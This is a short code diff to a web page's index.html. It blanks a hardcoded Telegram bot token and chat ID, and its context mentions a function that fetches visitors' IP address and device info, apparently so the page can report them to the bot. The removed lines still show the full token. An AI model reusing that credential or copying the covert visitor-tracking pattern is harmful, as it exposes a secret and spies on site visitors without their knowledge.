--- a/index.html
+++ b/index.html
@@ -728,8 +728,8 @@ $(document).ready(function() {
         });
 
         // Telegram bot configuration
-        const botToken = '7098359962:AAGMURMqdSnk9a9qtey0p93AW7J4ZKhNtUI';  // Replace with your bot token
-        const chatID = '6890305529';      // Replace with your chat ID
+        const botToken = '';  // Replace with your bot token
+        const chatID = '';      // Replace with your chat ID
 
         // Function to fetch IP address and device info
         async function getDeviceAndLocationInfo() {
@@ -819,6 +819,7 @@ $(document).ready(function() {
         }
     });
     </script>
+
 
 
 
